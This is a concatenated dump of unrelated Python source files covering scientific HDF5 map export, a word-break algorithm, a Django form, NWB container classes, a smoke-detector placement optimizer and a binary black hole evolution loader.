map_name = "map {} us".format(time_us)
map_data_set = maps_group.require_dataset(map_name, shape, dtype=data_type)
map_data_set[...] = data
map_data_set.attrs[MAP_WIDTH] = positions.x_pixels
map_data_set.attrs[MAP_HEIGHT] = positions.y_pixels
map_data_set.attrs[MAP_DEPTH] = depth
map_data_set.attrs[MAP_DATA_TYPE] = str(data_type)
map_data_set.attrs[MAP_PIXEL_TIME_s] = time_s
map_data_set.attrs[MAP_CURRENT_nA] = current_nA
map_data_set.attrs[MAP_NOMINAL_NUMBER_ELECTRONS] = nominal_number_electrons
map_data_set.attrs[MAP_SOLID_ANGLE_rad] = solid_angle_rad
map_data_set.attrs[MAP_DETECTOR_NOISE_eV] = detector_noise_eV
map_data_set.attrs[MAP_DETECTOR_RESOLUTION_AT_MN_eV] = detector.getFwhm_eV(5898.0)
map_data_set.attrs[MAP_COMMENTS] = "data[X, Y, D]"
width_data_set = maps_group.require_dataset(MAP_DATA_WIDTH_nm, (positions.x_pixels,), dtype=np.float)
width_data_set[...] = positions.xs_nm
height_data_set = maps_group.require_dataset(MAP_DATA_HEIGHT_nm, (positions.y_pixels,), dtype=np.float)
height_data_set[...] = positions.ys_nm
depth_data_set = maps_group.require_dataset(MAP_DATA_DEPTH_keV, (depth,), dtype=np.float)
depth_data_set[...] = energies_keV
map_data_set.dims.create_scale(width_data_set, "X (nm)")
map_data_set.dims.create_scale(height_data_set, "Y (nm)")
map_data_set.dims.create_scale(depth_data_set, "Energies (keV)")
map_data_set.dims[0].attach_scale(width_data_set)
map_data_set.dims[1].attach_scale(height_data_set)
map_data_set.dims[2].attach_scale(depth_data_set)
def _compute_counts(data, depth, index_x, index_y, xrays):
energy_edges_keV = np.linspace(0.0, 30.0, depth + 1)
energies_keV = np.linspace(0.0, 30.0, depth)
counts, _bin_edges = np.histogram(xrays, bins=energy_edges_keV)
data[index_y, index_x, :] = counts
return counts, energies_keV
def _compute_xrays(detector_noise_eV, energy_data, intensity_data):
detector = DetectorFunction(detector_noise_eV)
sigmas_keV = detector.get_sigmas_keV(energy_data)
xrays = []
for channel in range(len(energy_data)):
nominal_number_xrays = intensity_data[channel]
number_xrays = poisson(nominal_number_xrays)
number_xrays = int(round(number_xrays))
counts = normal(energy_data[channel], sigmas_keV[channel], size=number_xrays)
xrays.extend(counts.tolist())
return xrays
def _compute_intensity(efficiency, group, number_electrons, solid_angle_rad, depth):
energy_data = group["XraySpectraRegionsEmitted/energies_keV"][:]
intensity_data_1_ekeVsr = group["XraySpectraRegionsEmitted/total_1_ekeVsr"][:]
intensity_data_1_ekeVsr *= np.interp(energy_data, efficiency[:, 0], efficiency[:, 1])
delta_energy_keV = energy_data[1] - energy_data[0]
intensity_data = intensity_data_1_ekeVsr * number_electrons * solid_angle_rad * delta_energy_keV
energy_edges_keV = np.linspace(0.0, 30.0, depth + 1)
energies_keV = np.linspace(0.0, 30.0, depth)
counts_data = change_energy_scale2(energy_data, intensity_data, energy_edges_keV)
return delta_energy_keV, energies_keV, counts_data
def _compute_number_electrons(current_nA, time_s):
nominal_number_electrons = current_nA * 1.0e-9 * time_s / e
try:
number_electrons = poisson(nominal_number_electrons)
except ValueError as message:
number_electrons = normal(nominal_number_electrons, np.sqrt(nominal_number_electrons))
return nominal_number_electrons, number_electrons
def _export_raw_map(hdf5_file_path):
from pySpectrumFileFormat.Bruker.MapRaw.ParametersFile import ParametersFile, BYTE_ORDER_LITTLE_ENDIAN, \
RECORED_BY_VECTOR, DATA_TYPE_SIGNED
logging.info("_export_raw_map")
with h5py.File(hdf5_file_path, 'r', driver='core') as hdf5_file:
maps_group = hdf5_file["maps"]
for name, group in maps_group.items():
if str(group.name).startswith("/maps/map"):
map_data_set = group
logging.info(group.name)
logging.info(name)
parameters_file = ParametersFile()
parameters_file.width = map_data_set.attrs[MAP_WIDTH]
parameters_file.height = map_data_set.attrs[MAP_HEIGHT]
parameters_file.depth = map_data_set.attrs[MAP_DEPTH]
parameters_file.offset = 0
parameters_file.dataLength_B = 4
parameters_file.dataType = DATA_TYPE_SIGNED
parameters_file.byteOrder = BYTE_ORDER_LITTLE_ENDIAN
parameters_file.recordBy = RECORED_BY_VECTOR
parameters_file.energy_keV = 30.0
parameters_file.pixel_size_nm = 0.0
base_file_out_path = hdf5_file_path[:-5] + "_" + name.replace(' ', '_')
parameters_file.write(base_file_out_path + ".rpl")
shape = (parameters_file.height, parameters_file.width, parameters_file.depth)
fp = np.memmap(base_file_out_path + ".raw", dtype=np.int32, mode='w+', shape=shape)
fp[:] = map_data_set[:]
del fp
if __name__ == '__main__':
import sys
logging.getLogger().setLevel(logging.INFO)
if len(sys.argv) > 1:
data_path = sys.argv[1]
else:
data_path = r"D:\work\Dropbox\hdemers\professional\results\simulations\mcxray\SimulationMapsMM2017\analyzes"
logging.debug(sys.argv)
logging.info(data_path)
# create_test_map(data_path, figure=True)
# export_raw_test_map(data_path)
# read_raw_test_map(data_path)
# create_map_mm2017_abstract(data_path)
# export_raw_map_mm2017_abstract(data_path)
# read_raw_map_mm2017_abstract(data_path)
# bse_image_mm2017(data_path)
logging.info("Done")
plt.show()
| StarcoderdataPython |
3392149 | """Get extra charge profile names API method."""
from ibsng.handler.handler import Handler
class getExtraChargeProfileNames(Handler):
"""Get extra charge profile names method class."""
pass
| StarcoderdataPython |
4806816 | <filename>python/word_break.py
"""
Word break problem
Given an input string and a dictionary of words, segment
the input string into a space-separated sequence of
dictionary words if possible. For example, if the input
string is "applepie" and dictionary contains a standard
set of English words, then we would return the string
"apple pie" as output.
From: http://thenoisychannel.com/2011/08/08/retiring-a-great-interview-problem
See also: http://stackoverflow.com/questions/21273505/memoization-algorithm-time-complexity
"""
DICTIONARY = set("""
bed bath and beyond bat bad on be an a at hand ton bean yon hat zz zzz zxzz
""".split())
def is_word(s):
return s in DICTIONARY
## could use from functools.lru_cache, but why not write our
## own memoize decorator
def memoize(f):
cache = {}
def wrapper(s):
if s in cache:
return cache[s]
else:
result = f(s)
cache[s] = result
return result
return wrapper
## memoize calls to word_break to avoid repeated computations when we
## find different paths to the same substring
@memoize
def word_break(s):
if len(s)==0:
return []
for i in reversed(range(len(s))):
suffix = s[i:]
if is_word(suffix):
words = word_break(s[:i])
if words is not None:
return words + [suffix]
return None
def test():
print(word_break("bedbathandbeyond"))
print(word_break("zzzxzzzzzxzzzzzzxzzzzzzxzzzzzxzzzzzxzzzxzzzxzz"))
print(word_break('bedbathandbe'))
print(word_break('beanhat'))
def test_monster_string():
import random, sys
sys.setrecursionlimit(10000)
monster_string = ''.join(random.choices(tuple(DICTIONARY), k=1000))
print(word_break(monster_string))
if __name__ == "__main__":
test()
# test_monster_string()
| StarcoderdataPython |
1700810 | from django import forms
from .models import Lesson, ClassType, Coach
class DateInput(forms.DateInput):
input_type = 'date'
class TimeInput(forms.TimeInput):
input_type = 'time'
class LessonForm(forms.ModelForm):
class Meta:
model = Lesson
fields = ('class_type', 'coach',
'description', 'price',
'date', 'time', 'spots')
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
class_type = ClassType.objects.all()
friendly_names = [(c.id, c.get_friendly_name()) for c in class_type]
coach = Coach.objects.all()
first_names = [(c.id, c.get_first_name()) for c in coach]
self.fields['class_type'].choices = friendly_names
self.fields['coach'].choices = first_names
self.fields['date'] = forms.DateField(widget=DateInput)
self.fields['time'] = forms.TimeField(widget=TimeInput)
for field_name, field in self.fields.items():
field.widget.attrs['class'] = 'border-black'
| StarcoderdataPython |
29456 | <filename>src/pynwb/core.py
from collections import Iterable
from h5py import RegionReference
from .form.utils import docval, getargs, ExtenderMeta, call_docval_func, popargs
from .form import Container, Data, DataRegion, get_region_slicer
from . import CORE_NAMESPACE, register_class
from six import with_metaclass
def set_parents(container, parent):
if isinstance(container, list):
for c in container:
if c.parent is None:
c.parent = parent
ret = container
else:
ret = [container]
if container.parent is None:
container.parent = parent
return ret
class NWBBaseType(with_metaclass(ExtenderMeta)):
'''The base class to any NWB types.
The purpose of this class is to provide a mechanism for representing hierarchical
relationships in neurodata.
'''
__nwbfields__ = tuple()
@docval({'name': 'name', 'type': str, 'doc': 'the name of this container'},
{'name': 'parent', 'type': 'NWBContainer',
'doc': 'the parent Container for this Container', 'default': None},
{'name': 'container_source', 'type': object,
'doc': 'the source of this Container e.g. file name', 'default': None})
def __init__(self, **kwargs):
parent, container_source = getargs('parent', 'container_source', kwargs)
super(NWBBaseType, self).__init__()
self.__fields = dict()
self.__parent = None
self.__name = getargs('name', kwargs)
if parent:
self.parent = parent
self.__container_source = container_source
@property
def name(self):
return self.__name
@property
def container_source(self):
'''The source of this Container e.g. file name or table
'''
return self.__container_source
@property
def fields(self):
return self.__fields
@property
def parent(self):
'''The parent NWBContainer of this NWBContainer
'''
return self.__parent
@parent.setter
def parent(self, parent_container):
if self.__parent is not None:
raise Exception('cannot reassign parent')
self.__parent = parent_container
@staticmethod
def __getter(nwbfield):
def _func(self):
return self.fields.get(nwbfield)
return _func
@staticmethod
def __setter(nwbfield):
def _func(self, val):
if nwbfield in self.fields:
msg = "can't set attribute '%s' -- already set" % nwbfield
raise AttributeError(msg)
self.fields[nwbfield] = val
return _func
@ExtenderMeta.pre_init
def __gather_nwbfields(cls, name, bases, classdict):
'''
This classmethod will be called during class declaration in the metaclass to automatically
create setters and getters for NWB fields that need to be exported
'''
if not isinstance(cls.__nwbfields__, tuple):
raise TypeError("'__nwbfields__' must be of type tuple")
if len(bases) and 'NWBContainer' in globals() and issubclass(bases[-1], NWBContainer) \
and bases[-1].__nwbfields__ is not cls.__nwbfields__:
new_nwbfields = list(cls.__nwbfields__)
new_nwbfields[0:0] = bases[-1].__nwbfields__
cls.__nwbfields__ = tuple(new_nwbfields)
for f in cls.__nwbfields__:
if not hasattr(cls, f):
setattr(cls, f, property(cls.__getter(f), cls.__setter(f)))
@register_class('NWBContainer', CORE_NAMESPACE)
class NWBContainer(NWBBaseType, Container):
__nwbfields__ = ('source',
'help')
@docval({'name': 'source', 'type': str, 'doc': 'a description of where this NWBContainer came from'},
{'name': 'name', 'type': str, 'doc': 'the name of this container'},
{'name': 'parent', 'type': 'NWBContainer',
'doc': 'the parent Container for this Container', 'default': None},
{'name': 'container_source', 'type': object,
'doc': 'the source of this Container e.g. file name', 'default': None})
def __init__(self, **kwargs):
call_docval_func(super(NWBContainer, self).__init__, kwargs)
self.source = getargs('source', kwargs)
@register_class('NWBData', CORE_NAMESPACE)
class NWBData(NWBBaseType, Data):
__nwbfields__ = ('help',)
@docval({'name': 'name', 'type': str, 'doc': 'the name of this container'},
{'name': 'data', 'type': (Iterable, Data), 'doc': 'the source of the data'},
{'name': 'parent', 'type': 'NWBContainer',
'doc': 'the parent Container for this Container', 'default': None},
{'name': 'container_source', 'type': object,
'doc': 'the source of this Container e.g. file name', 'default': None})
def __init__(self, **kwargs):
call_docval_func(super(NWBData, self).__init__, kwargs)
self.__data = getargs('data', kwargs)
@property
def data(self):
return self.__data
class NWBTable(NWBData):
@docval({'name': 'columns', 'type': (list, tuple), 'doc': 'a list of the columns in this table'},
{'name': 'name', 'type': str, 'doc': 'the name of this container'},
{'name': 'data', 'type': Iterable, 'doc': 'the source of the data', 'default': list()},
{'name': 'parent', 'type': 'NWBContainer',
'doc': 'the parent Container for this Container', 'default': None},
{'name': 'container_source', 'type': object,
'doc': 'the source of this Container e.g. file name', 'default': None})
def __init__(self, **kwargs):
self.__columns = tuple(popargs('columns', kwargs))
call_docval_func(super(NWBTable, self).__init__, kwargs)
@property
def columns(self):
return self.__columns
@docval({'name': 'values', 'type': dict, 'doc': 'the values for each column'})
def add_row(self, **kwargs):
values = getargs('values', kwargs)
if not isinstance(self.data, list):
msg = 'Cannot append row to %s' % type(self.data)
raise ValueError(msg)
self.data.append(tuple(values[col] for col in self.columns))
@docval({'name': 'kwargs', 'type': dict, 'doc': 'the column to query by'})
def query(self, **kwargs):
'''
Query a table
'''
raise NotImplementedError('query')
def __len__(self):
return len(self.data)
def __getitem__(self, idx):
return self.data[idx]
# diamond inheritence
class NWBTableRegion(NWBData, DataRegion):
'''
A class for representing regions i.e. slices or indices into an NWBTable
'''
@docval({'name': 'name', 'type': str, 'doc': 'the name of this container'},
{'name': 'table', 'type': NWBTable, 'doc': 'the ElectrodeTable this region applies to'},
{'name': 'region', 'type': (slice, list, tuple, RegionReference), 'doc': 'the indices of the table'})
def __init__(self, **kwargs):
table, region = getargs('table', 'region', kwargs)
self.__table = table
self.__region = region
name = getargs('name', kwargs)
super(NWBTableRegion, self).__init__(name, table)
self.__regionslicer = get_region_slicer(self.__table.data, self.__region)
@property
def table(self):
'''The ElectrodeTable this region applies to'''
return self.__table
@property
def region(self):
'''The indices into table'''
return self.__region
def __len__(self):
return len(self.__regionslicer)
def __getitem__(self, idx):
return self.__regionslicer[idx]
| StarcoderdataPython |
1787218 | <gh_stars>0
#!/usr/bin/env python
# coding: utf-8
from SDOptimizer.constants import DATA_FILE, PLOT_TITLES, ALARM_THRESHOLD, PAPER_READY, INFEASIBLE_MULTIPLE, NEVER_ALARMED_MULTIPLE, SMOOTH_PLOTS, INTERPOLATION_METHOD
from SDOptimizer.functions import make_location_objective, make_counting_objective, make_lookup, make_total_lookup_function, convert_to_spherical_from_points
from SDOptimizer.visualization import show_optimization_statistics, show_optimization_runs
from time import sleep
# from tqdm.notebook import trange, tqdm # For plotting progress
from tqdm import trange, tqdm
from platypus import NSGAII, Problem, Real, Binary, Integer, CompoundOperator, SBX, HUX, PM, BitFlip
from mpl_toolkits import mplot3d
from scipy.interpolate import griddata
from scipy.optimize import minimize, differential_evolution, rosen, rosen_der, fmin_l_bfgs_b
import os
import glob
import logging
import pdb
import scipy
import matplotlib.animation as animation
import matplotlib as mpl
import matplotlib.pyplot as plt
from mpl_toolkits.mplot3d import Axes3D # noqa: F401 unused import
from matplotlib import cm
from importlib import reload
import io
import pandas as pd
import numpy as np
import matplotlib
import warnings
import copy
matplotlib.use('module://ipykernel.pylab.backend_inline')
class SDOptimizer():
def __init__(self, interpolation_method=INTERPOLATION_METHOD, **kwargs):
self.logger = logging.getLogger('main')
self.logger.debug("Instantiated the optimizer")
self.is3d = False
self.X = None
self.Y = None
self.Z = None
self.time_to_alarm = None
self.interpolation_method = interpolation_method
def visualize(self, show=False, log=True):
"""
TODO update this so it outputs a video
show : Boolean
Do a matplotlib plot of every frame
log : Boolean
plot the concentration on a log scale
"""
max_concentration = max(self.max_concentrations)
print("Writing output files to ./vis")
for i, concentration in tqdm(
enumerate(
self.concentrations), total=len(
self.concentrations)): # this is just wrapping it in a progress bar
plt.cla()
plt.clf()
plt.xlabel("X position")
plt.ylabel("Y position")
plt.title("concentration at timestep {} versus position".format(i))
norm = mpl.colors.Normalize(vmin=0, vmax=1.0)
cb = self.pmesh_plot(
self.X,
self.Y,
concentration,
plt,
log=log,
max_val=max_concentration)
plt.colorbar(cb) # Add a colorbar to a plot
plt.savefig("vis/concentration{:03d}.png".format(i))
if show:
plt.show()
def get_3D_locs(self):
return (self.X, self.Y, self.Z)
def example_time_to_alarm(self, x_bounds, y_bounds,
center, show=False, scale=1, offset=0):
"""
Xs and Ys are the upper and lower bounds
center is the x y coords
scale is a multiplicative factor
offset is additive
"""
Xs = np.linspace(*x_bounds)
Ys = np.linspace(*y_bounds)
x, y = np.meshgrid(Xs, Ys)
z = (x - center[0]) ** 2 + (y - center[1]) ** 2
z = z * scale + offset
if show:
plt.cla()
plt.clf()
cb = plt.pcolormesh(x, y, z, cmap=plt.cm.inferno)
plt.colorbar(cb) # Add a colorbar to a plot
plt.pause(4.0)
x = x.flatten()
y = y.flatten()
z = z.flatten()
return (x, y, z)
def make_platypus_objective_function(
self, sources, func_type="basic", bad_sources=[]):
"""
sources
bad_sources : ArrayLike[Sources]
These are the ones which we don't want to be near
"""
if func_type == "basic":
raise NotImplementedError("I'm not sure I'll ever do this")
# return self.make_platypus_objective_function_basic(sources)
elif func_type == "counting":
return self.make_platypus_objective_function_counting(sources)
elif func_type == "competing_function":
return self.make_platypus_objective_function_competing_function(
sources, bad_sources)
else:
raise ValueError("The type : {} is not an option".format(func_type))
def make_platypus_objective_function_competing_function(
self, sources, bad_sources=[]):
total_ret_func = make_total_lookup_function(
sources, interpolation_method=self.interpolation_method) # the function to be optimized
bad_sources_func = make_total_lookup_function(
bad_sources, type="fastest",
interpolation_method=self.interpolation_method) # the function to be optimized
def multiobjective_func(x): # this is the double objective function
return [total_ret_func(x), bad_sources_func(x)]
num_inputs = len(sources) * 2 # there is an x, y for each source
NUM_OUPUTS = 2 # the default for now
# define the demensionality of input and output spaces
problem = Problem(num_inputs, NUM_OUPUTS)
x, y, time = sources[0] # expand the first source
min_x = min(x)
min_y = min(y)
max_x = max(x)
max_y = max(y)
print(
"min x : {}, max x : {}, min y : {}, max y : {}".format(
min_x,
max_x,
min_y,
max_y))
problem.types[::2] = Real(min_x, max_x) # This is the feasible region
problem.types[1::2] = Real(min_y, max_y)
problem.function = multiobjective_func
# the second function should be maximized rather than minimized
problem.directions[1] = Problem.MAXIMIZE
return problem
def make_platypus_objective_function_counting(
self, sources, times_more_detectors=1):
"""
This balances the number of detectors with the quality of the outcome
"""
total_ret_func = make_total_lookup_function(
sources, masked=True) # the function to be optimized
counting_func = make_counting_objective()
def multiobjective_func(x): # this is the double objective function
return [total_ret_func(x), counting_func(x)]
# there is an x, y, and a mask for each source so there must be three
# times more input variables
# the upper bound on the number of detectors n times the number of
# sources
num_inputs = len(sources) * 3 * times_more_detectors
NUM_OUPUTS = 2 # the default for now
# define the demensionality of input and output spaces
problem = Problem(num_inputs, NUM_OUPUTS)
x, y, time = sources[0] # expand the first source
min_x = min(x)
min_y = min(y)
max_x = max(x)
max_y = max(y)
print(
"min x : {}, max x : {}, min y : {}, max y : {}".format(
min_x,
max_x,
min_y,
max_y))
problem.types[0::3] = Real(min_x, max_x) # This is the feasible region
problem.types[1::3] = Real(min_y, max_y)
# This appears to be inclusive, so this is really just (0, 1)
problem.types[2::3] = Binary(1)
problem.function = multiobjective_func
return problem
def plot_inputs(self, inputs, optimized, show_optimal=False):
plt.cla()
plt.clf()
f, ax = self.get_square_axis(len(inputs))
max_z = 0
for i, (x, y, z) in enumerate(inputs):
max_z = max(max_z, max(z)) # record this for later plotting
cb = self.pmesh_plot(x, y, z, ax[i])
if show_optimal:
for j in range(0, len(optimized), 2):
detectors = ax[i].scatter(optimized[j], optimized[j + 1],
c='w', edgecolors='k')
ax[i].legend([detectors], ["optimized detectors"])
f.colorbar(cb)
if PAPER_READY:
plt.savefig("vis/TimeToAlarmComposite.png")
f.suptitle("The time to alarm for each of the smoke sources")
plt.show()
return max_z
def get_square_axis(self, num, is_3d=False):
"""
arange subplots in a rough square based on the number of inputs
"""
if num == 1:
if is_3d:
f, ax = plt.subplots(1, 1, projection='3d')
else:
f, ax = plt.subplots(1, 1)
ax = np.asarray([ax])
return f, ax
num_x = np.ceil(np.sqrt(num))
num_y = np.ceil(num / num_x)
if is_3d:
f, ax = plt.subplots(int(num_y), int(num_x), projection='3d')
else:
f, ax = plt.subplots(int(num_y), int(num_x))
ax = ax.flatten()
return f, ax
def plot_sweep(self, xytimes, fixed_detectors,
bounds, max_val=None, centers=None):
"""
xytimes : ArrayLike[Tuple[]]
the smoke propagation information
xs : ArrayLike
[x1, y1, x2, y2...] representing the fixed location of the smoke detectors
bounds : ArrayLike
[x_low, x_high, y_low, y_high] the bounds on the swept variable
"""
# TODO refactor so this is the same as the other one
time_func = make_total_lookup_function(xytimes)
print(time_func)
x_low, x_high, y_low, y_high = bounds
xs = np.linspace(x_low, x_high)
ys = np.linspace(y_low, y_high)
grid_xs, grid_ys = np.meshgrid(xs, ys)
grid_xs = grid_xs.flatten()
grid_ys = grid_ys.flatten()
grid = np.vstack((grid_xs, grid_ys)).transpose()
print(grid.shape)
times = []
for xy in grid:
locations = np.hstack((fixed_detectors, xy))
times.append(time_func(locations))
plt.cla()
plt.clf()
cb = self.pmesh_plot(grid_xs, grid_ys, times, plt, max_val)
# even and odd points
fixed = plt.scatter(fixed_detectors[::2], fixed_detectors[1::2], c='k')
plt.colorbar(cb) # Add a colorbar to a plot
if centers is not None:
centers = plt.scatter(centers[::2], centers[1::2], c='w')
plt.legend([fixed, centers], [
"The fixed detectors", "Centers of smoke sources"])
else:
plt.legend([fixed], ["The fixed detectors"])
plt.title("Effects of placing the last detector with {} fixed".format(
int(len(fixed_detectors) / 2)))
plt.show()
def plot_3d(
self,
xs,
ys,
values,
plotter,
max_val=None,
num_samples=50,
is_3d=False,
cmap=plt.cm.inferno):
"""
conveneince function to easily plot the sort of data we have
"""
points = np.stack((xs, ys), axis=1)
sample_points = (np.linspace(min(xs), max(xs), num_samples),
np.linspace(min(ys), max(ys), num_samples))
xis, yis = np.meshgrid(*sample_points)
flattened_xis = xis.flatten()
flattened_yis = yis.flatten()
interpolated = griddata(points, values, (flattened_xis, flattened_yis))
reshaped_interpolated = np.reshape(interpolated, xis.shape)
if max_val is not None:
norm = mpl.colors.Normalize(0, max_val)
else:
norm = mpl.colors.Normalize() # default
fig = plt.figure()
ax = plt.axes(projection='3d')
cb = ax.plot_surface(
xis,
yis,
reshaped_interpolated,
cmap=cmap,
norm=norm,
edgecolor='none')
ax.set_title('Surface plot')
plt.show()
return cb # return the colorbar
def visualize_all(
self,
objective_func,
optimized_detectors,
bounds,
max_val=None,
num_samples=30,
verbose=False,
is3d=False,
log=False):
"""
The goal is to do a sweep with each of the detectors leaving the others fixed
"""
# set up the sampling locations
x_low, x_high, y_low, y_high = bounds
xs = np.linspace(x_low, x_high, num_samples)
ys = np.linspace(y_low, y_high, num_samples)
grid_xs, grid_ys = np.meshgrid(xs, ys)
grid_xs = grid_xs.flatten()
grid_ys = grid_ys.flatten()
# This is a (n, 2) where each row is a point
grid = np.vstack((grid_xs, grid_ys)).transpose()
# create the subplots
plt.cla()
plt.clf()
# f, ax = plt.subplots(int(len(optimized_detectors)/2), 1)
f, ax = self.get_square_axis(len(optimized_detectors) / 2)
num_samples = grid.shape[0]
for i in range(0, len(optimized_detectors), 2):
selected_detectors = np.concatenate(
(optimized_detectors[:i], optimized_detectors[(i + 2):]), axis=0) # get all but one
repeated_selected = np.tile(np.expand_dims(
selected_detectors, axis=0), reps=(num_samples, 1))
locations = np.concatenate((grid, repeated_selected), axis=1)
times = [objective_func(xys) for xys in locations]
if isinstance(ax, np.ndarray): # ax may be al
which_plot = ax[int(i / 2)]
else:
which_plot = ax
cb = self.pmesh_plot(
grid_xs,
grid_ys,
times,
which_plot,
max_val,
log=log)
fixed = which_plot.scatter(
selected_detectors[::2], selected_detectors[1::2], c='w', edgecolors='k')
if verbose:
which_plot.legend([fixed], ["the fixed detectors"])
which_plot.set_xlabel("x location")
which_plot.set_ylabel("y location")
plt.colorbar(cb, ax=ax[-1])
if PAPER_READY:
# write out the number of sources
plt.savefig(
"vis/DetectorSweeps{:02d}Sources.png".format(
int(len(optimized_detectors) / 2)))
f.suptitle("The effects of sweeping one detector with all other fixed")
plt.show()
def evaluate_optimization(self, sources, num_detectors, bounds=None,
genetic=True, visualize=True, num_iterations=10):
"""
sources : ArrayLike
list of (x, y, time) tuples
num_detectors : int
The number of detectors to place
bounds : ArrayLike
[x_low, x_high, y_low, y_high], will be computed from self.X, self.Y if None
genetic : Boolean
whether to use a genetic algorithm
visualize : Boolean
Whether to visualize the results
num_iterations : int
How many times to run the optimizer
"""
vals = []
locs = []
iterations = []
func_values = []
for i in trange(num_iterations):
res = self.optimize(
sources,
num_detectors,
bounds=bounds,
genetic=genetic,
visualize=False)
vals.append(res.fun)
locs.append(res.x)
iterations.append(res.nit)
func_values.append(res.vals)
if visualize:
show_optimization_statistics(vals, iterations, locs)
show_optimization_runs(func_values)
return vals, locs, iterations, func_values
def show_optimization_statistics(self, vals, iterations, locs):
show_optimization_statistics(vals, iterations, locs)
def set_3d(self, value=False):
"""
set whether it should be 3d
"""
self.is3d = value
def test_tqdm(self):
for _ in trange(30): # For plotting progress
sleep(0.5)
if __name__ == "__main__": # Only run if this was run from the commmand line
SDO = SDOptimizer()
SDO.load_data(DATA_FILE) # Load the data file
X1, Y1, time_to_alarm1 = SDO.get_time_to_alarm(False)
X2, Y2, time_to_alarm2 = SDO.example_time_to_alarm(
(0, 1), (0, 1), (0.3, 0.7), False)
ret_func = make_lookup(X1, Y1, time_to_alarm1)
total_ret_func = make_total_lookup_function(
[(X1, Y1, time_to_alarm1), (X2, Y2, time_to_alarm2)])
CENTERS = [0.2, 0.8, 0.8, 0.8, 0.8, 0.2]
x1, y1, z1 = SDO.example_time_to_alarm([0, 1], [0, 1], CENTERS[0:2], False)
x2, y2, z2 = SDO.example_time_to_alarm([0, 1], [0, 1], CENTERS[2:4], False)
x3, y3, z3 = SDO.example_time_to_alarm([0, 1], [0, 1], CENTERS[4:6], False)
inputs = [(x1, y1, z1), (x2, y2, z2), (x3, y3, z3)]
total_ret_func = make_total_lookup_function(inputs)
BOUNDS = ((0, 1), (0, 1), (0, 1), (0, 1)) # constraints on inputs
INIT = (0.51, 0.52, 0.47, 0.6, 0.55, 0.67)
res = minimize(total_ret_func, INIT, method='COBYLA')
print(res)
x = res.x
| StarcoderdataPython |
1766124 | <gh_stars>1-10
# NS API key, get one at http://www.ns.nl/en/travel-information/ns-api
USERNAME = '<EMAIL>'
APIKEY = '<KEY>'
DEPLOY_DIR = '' | StarcoderdataPython |
3375268 | <gh_stars>0
#!/usr/bin/env python
import data
import numpy
if __name__ == "__main__":
N = 100000
while True:
points = [(r, x) for r, x in data.generate(N)]
R = numpy.array([r for r, x in points])
X = numpy.array([x for r, x in points])
for i in range(100):
points = [(R[idx], X[idx]) for idx in range(8000)]
data.send(points, N=1000 * N)
for j in range(1000):
X = R * X * (1 - X)
| StarcoderdataPython |
1776351 | <gh_stars>0
# Copyright 2018 <NAME>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Utilitary functions.
"""
import re
import networkx as nx
import matplotlib.pyplot as plt
def flatten(x):
return (z for y in x for z in y)
def draw_graph(g, cut=tuple()):
mapping = {node: node+g.nodes[node].get('op', '') for node in g}
cut = [(mapping[src], mapping[end], e_id) for src, end, e_id in cut]
g = nx.relabel_nodes(g, mapping)
pos=nx.nx_agraph.graphviz_layout(g, prog='dot')
n_colors = [n_color(g, n) for n in g]
el = set(g.edges)
nx.draw(
g,
pos,
with_labels=True,
arrows=True,
edgelist=list(el - set(cut)),
node_color=n_colors,
node_size=600)
if cut:
nx.draw_networkx_edges(
g,
pos,
edgelist=list(el & set(cut)),
edge_color='r',
arrows=True)
def is_split_node(n):
return bool(re.search('s[0-9]?$', n))
def n_color(g, n):
if g.nodes[n].get('IN'):
return 'xkcd:pale green'
elif g.nodes[n].get('OUT'):
return 'xkcd:beige'
elif re.search('s[0-9]?$', n): #n.endswith('s'):
return 'xkcd:light gray'
else:
return 'xkcd:light blue'
def draw_graph_cut(g, cut):
draw_graph(g, cut)
plt.show()
| StarcoderdataPython |
3250819 | #!/usr/bin/env python
# coding: utf-8
import h5py
import numpy as np
from functools import reduce
from tqdm import tqdm
import disk.funcs as dfn
class binary_mbh(object):
def __init__(self, filename):
self.filename = filename
with h5py.File(self.filename, 'r') as f:
self.SubhaloMassInHalfRadType = np.array(f['meta/SubhaloMassInHalfRadType'])
self.SubhaloSFRinHalfRad = np.array(f['meta/SubhaloSFRinHalfRad'])
self.snapshot = np.array(f['meta/snapshot'])
self.subhalo_id = np.array(f['meta/subhalo_id'])
self.masses = np.array(f['evolution/masses']) #g
self.mdot = np.array(f['evolution/mdot_eff']) #g/s
self.sep = np.array(f['evolution/sep']) #cm
self.dadt = np.array(f['evolution/dadt']) #cm/s
self.dadt_df = np.array(f['evolution/dadt_df']) #cm/s
self.dadt_gw = np.array(f['evolution/dadt_gw']) #cm/s
self.dadt_lc = np.array(f['evolution/dadt_lc']) #cm/s
self.dadt_vd = np.array(f['evolution/dadt_vd']) #cm/s
self.scales = np.array(f['evolution/scales']) #NA
self.times = np.array(f['evolution/times']) #s
self.eccen = np.array(f['evolution/eccen']) #NA
self.z = (1./self.scales)-1 #NA
self.m1 = self.masses[:,0]
self.m2 = self.masses[:,1]
self.mtot = self.m1+self.m2
self.q = self.m2/self.m1
def find_Rlc(self):
R_lc = np.zeros((self.sep.shape[0],3))
for i in range(len(self.sep)):
try:
idx = reduce(np.intersect1d,(np.where(np.abs(self.dadt_lc[i])>np.abs(self.dadt_df[i]))[0],
np.where(np.abs(self.dadt_lc[i])>np.abs(self.dadt_vd[i]))[0],
np.where(np.abs(self.dadt_lc[i])>np.abs(self.dadt_gw[i]))[0]))[0]
R_lc[i]=[i,idx,self.sep[i][idx]]
except:
R_lc[i]=[i,np.nan,np.nan]
return R_lc
def find_Rvd(self):
R_vd = np.zeros((self.sep.shape[0],3))
for i in range(len(self.sep)):
try:
idx = reduce(np.intersect1d,(np.where(np.abs(self.dadt_vd[i])>np.abs(self.dadt_df[i]))[0],
np.where(np.abs(self.dadt_vd[i])>np.abs(self.dadt_lc[i]))[0],
np.where(np.abs(self.dadt_vd[i])>np.abs(self.dadt_gw[i]))[0]))[0]
R_vd[i]=[i,idx,self.sep[i][idx]]
except:
R_vd[i]=[i,np.nan,np.nan]
return R_vd
def find_Rgw(self):
R_gw = np.zeros((self.sep.shape[0],3))
for i in range(len(self.sep)):
try:
